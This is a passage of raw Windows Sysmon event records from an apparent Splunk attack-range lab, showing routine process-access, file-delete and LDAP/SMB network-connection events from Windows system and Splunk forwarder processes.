LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-10D1-6216-4204-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.217{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D1-6216-4204-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:45.218{4F8D34B0-10D1-6216-4204-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:46.703{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE16FE0E7DF775CE7342845020FF4BA7,SHA256=C9067F7054A556344CB006CCA4FEC99C04705F6E637A57CF5111D59925AF7BD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:46.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B50D03686EA6D6A460AF1E94CC79BA4,SHA256=0B15614C35FE6F0A0E5B37C4A642AE7F818D6924094E34C21D15FD2CE2FFF378,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.212{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53394-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000287185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.212{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53394-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000287184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.113{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53393-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.113{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53393-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.102{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53392-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:44.102{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53392-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000216102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:46.420{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C90B86C05E9F62D77CF48BFE4DD96DAA,SHA256=D40529698B6F6119C8376100B1413C153EEAD0E195222BB7893F197A24A78185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:46.420{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03F7AB44C26A29718986D8ACEEA407C4,SHA256=15A4DA60C05833AE3212A603738E4B7F7676909D96910240BA71B9CA6F89D7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:47.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AEDE45BDEE9D24614ABF1B3B0797E0,SHA256=AB34BA5FBBE7951C99A1175FFA3D9BAF216E6D71BF3A7F7F8FCF2859470719B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.623{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74C0C0A87D62527F23266C84B289E6D2,SHA256=70488E56BC90A6CC3F1888B3D00D7522E6F7A69F0619CBA8F90267BB7F0B4270,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-10D3-6216-4404-000000003902}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 